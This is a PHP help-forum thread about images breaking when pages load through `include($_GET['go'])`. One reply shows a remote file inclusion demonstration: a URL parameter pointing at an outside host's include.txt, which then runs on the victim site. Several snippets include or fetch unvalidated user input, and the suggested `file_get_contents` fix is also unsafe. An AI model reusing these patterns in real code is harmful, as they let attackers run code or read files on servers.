Jump to content

Some thing wrong in this code.. Pls help

kganesh20

By kganesh20
in PHP Coding Help

 Share

Recommended Posts

kganesh20 Newbie

kganesh20

Posted
Posted 

<?
   if ( $_GET['go'] != '' ) {
     include($_GET['go']);
   }
?>

 

I am having a problem while using this code.. consider if the above code is saved as "123.php". If i want to open a html document called "Test.html" under a folder called "content", I will use "www.youngbuddy.com/123.php?go=content/Test.html" in the url bar. Here comes my problem, I am havin image("Image.jpg") file in "Test.html"(the image file also present in the same folder where "Test.html" present), While opening "www.youngbuddy.com/123.php?go=content/Test.html" it is not showing the image.. But if i open "www.youngbuddy.com/content/Test.html" it is showing the image.

 

The "www.youngbuddy.com/123.php?go=content/Test.html" is showing the image only when i change the image location in "Test.html" to "content/image.jpg(location from the folder where "123.php" is found)". This not happens not only in this page, in all the pages, it is very difficult to change all the location of images, document from root folder. Please help me

 

Sorry for my poor english if you cant understand. Below i created the pages to show what is my problem exactly. Please Help me.

 

Image location not changed "image.jpg":

 

www.youngbuddy.com/123.php?go=content/Test.html

www.youngbuddy.com/content/Test.html

 

Image location changed to "content/image.jpg":

 

www.youngbuddy.com/123.php?go=content/Test2.html

www.youngbuddy.com/content/Test2.html

 

Note:

Test.html is the file in which i saved the image location as "image.jpg"

Test2.html is the file in which i saved the image location as "content/image.jpg"

 

 

Pls help me  ??? ??? ???

Link to comment
https://forums.phpfreaks.com/topic/74694-some-thing-wrong-in-this-code-pls-help/
Share on other sites
stuffradio Regular Member

stuffradio

Posted
Posted

Well... just do what you did.

 

Change file location to "Content/image.jpg" or whatever it was. When you include the html file on the main page... it includes it as if it's actually executing the file. So it's trying to get the file from /image.jpg not content/image.jpg

Zane Prolific Member

Zane

Posted
Posted

notice that if you go here

http://www.youngbuddy.com/123.php?go=content/Image.jpg

 

you get this error

Parse error: syntax error, unexpected T_STRING in C:\Inetpub\vhosts\youngbuddy.com\httpdocs\Content\Image.jpg on line 30

kganesh20 Newbie

kganesh20

Posted
  • Author
Posted

Try like this:

<?
   if ( $_GET['go'] != '' ) {
     include("$_GET['go']");
   }
?>

 

While using this i get the error

 

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in F:\xampp\htdocs\New\Main1.php on line 7

 

 

 

It is not posible for me to change all the locations of the files...... Is there any other way to solve this? ???

 

kganesh20 Newbie

kganesh20

Posted
  • Author
Posted

But in these site you can see the thing can be done.. what i've told before

 

http://www.tamilflame.com/test.php?go=home.php

http://www.tamilflame.com/home.php

 

http://www.tamilflame.com/test.php?go=http://www.google.com

Not only google any site

 

Any one know how to do this? pls help me

 

 

premiso Regular Member

premiso

Posted
Posted

They probably have a validation filter setup.

 

The dangerous aspect of that is anyone can modify that url and point it to a file on their site which runs on your site.

 

http://www.yoursite.com/link.php?go=http://www.mysite.com/include.txt

 

Whatever is in the include .txt file will now execute due to the include statement. I could then overwrite your index.php file, or read any file contents I want and write them as a txt file and then open those text files which could give me database access or even just code.

 

Instead what tamilflame is doing is using www.php.net/file_get_contents  which does not execute code, instead just grabs it in a string/array and printing it to the screen.

 

The limitation to this is if you are on shared hosting, chances are it will not work due to security settings for the above mentioned.

kganesh20 Newbie

kganesh20

Posted
  • Author
Posted

Thanks premiso

 

  As you told before tamilflame.com does not execute code, instead just grabs it in a string/array and printing it to the screen. Thats what i am searching for.... Just now im started to learn php.. Can u write the code?

 

premiso Regular Member

premiso

Posted
Posted

note: include() of php code on another server will include() the output of that PHP, not the PHP itself.

 

eh, not necessarily. you could have the server echo back PHP code from PHP. never mind...

 

Ya i agree with you BlueSkyIS

 

Agree with what? Poor rambling of non-sense?

 

Here is a test for you, if you think include is the way to go:

 

Create this file on a site somewhere other than your main site, whether it is on a free hosted site or what I do not know:

 

include.txt

<?php
echo 'If you see this without the echo you have just been screwed by this file';
?>

 

Then create a test.php on your main site:

<?php
include($_GET['test']);
?>

 

Then reference your site via the following:

http://www.yoursite.com/test.php?test=http://www.othersite.com/include.txt

 

Let me know what you see on that test page. I bet you will just see "If you see this without the echo you have just been screwed by this file" and none of the other code.

 

Now all I have to do is write file operations in that code, and I can take down your whole system easily. I can even erase files, and most importantly overwrite/rename/display code.

 

 

Now that that part is aside here is one way to print out code without executing it:

 

<?php
$file = file_get_contents($_GET['website']); 

echo $header_data; // incase you have a header like on the sites example you need to print that out first

echo $file;

echo $footer_data; // footer comes last etc.
?>

kganesh20 Newbie

kganesh20

Posted
  • Author
Posted

I got this error when done with includ.txt and test.php

 

 

Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Inetpub\vhosts\youngbuddy.com\httpdocs\test.php on line 2

 

Warning: include(http://www.google.com) [function.include]: failed to open stream: no suitable wrapper could be found in C:\Inetpub\vhosts\youngbuddy.com\httpdocs\test.php on line 2

 

Warning: include() [function.include]: Failed opening 'http://www.google.com' for inclusion (include_path='.;./includes;./pear') in C:\Inetpub\vhosts\youngbuddy.com\httpdocs\test.php on line 2

premiso Regular Member

premiso

Posted
Posted

If this is a local server you need to allow remote access to files.

 

If you are on a shared server, well you are SOL. As they disable the fetching of remote files for security reasons as I explained above.

 

The setting would be in php.ini  and something like fopen_url  or similar. Look at the help contents of www.php.net/include  and  www.php.net/file_get_contents  it tells you what has to be enabled to use the including/fetching of remote files.

premiso Regular Member

premiso

Posted
Posted

Either way if it is or is not depreciated/being depreciated. It is good practice to not use the short tags due to XML conflicts and the fact that any server can turn them off.

 

http://talks.php.net/show/php-best-practices/10

 

Something to consider one way or the other.

kganesh20 Newbie

kganesh20

Posted
  • Author
Posted 

<?php
$file = file_get_contents($_GET['website']); 

echo $header_data; // incase you have a header like on the sites example you need to print that out first

echo $file;

echo $footer_data; // footer comes last etc.
?>

 

This code also not solved my prob...Here i will tell what my prob actually is....

 

Consider

The file 123.html contains images which are also in the same dir(content)..

If i execute Http://www.youngbuddy.com/main.php?go=content/test.html

 

When includeing the html file on the main page... it includes it as if it's actually executing the file. So it's trying to get the image file from the same dir where main.php is present and not the dir content/. It is not posible for me to change all the locations of images, pages, etc from the root dir.... for that main.php file

kganesh20 Newbie

kganesh20

Posted
  • Author
Posted

in main page your inlude must be

include ($_SERVER['DOCUMENT_ROOT'] .'/'.$_GET['go']);

 

in test.html you use

<img src="/content/image.jpg">

 

 

It showing the same result..  ??? :(

here is the link to show the result of the above code

http://www.youngbuddy.com/testtest.php?go=content/test.html

 

Code used in testtest.php:

<?
   if ( $_GET['go'] != '' ) {
     include($_SERVER['DOCUMENT_ROOT'].'/'.$_GET['go']);
   }
?>

sasa Newbie

sasa

Posted
Posted

You mast change test.html from

<html><head></head>
<body>
<img border="0" src="Image.jpg" width="450" height="350">
</body>
</html>

to

<html><head></head>
<body>
<img border="0" src="/content/Image.jpg" width="450" height="350">
</body>
</html>

use full path for jour pictures

kganesh20 Newbie

kganesh20

Posted
  • Author
Posted

Thanks for your reply...

 

Im having lot of images and php files and flash files in my website... So i need to change all the path of all the files.. It will take long time to done.. So is there any other way to show the image by setting the src as image.jpg instead of content/image.jpg

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.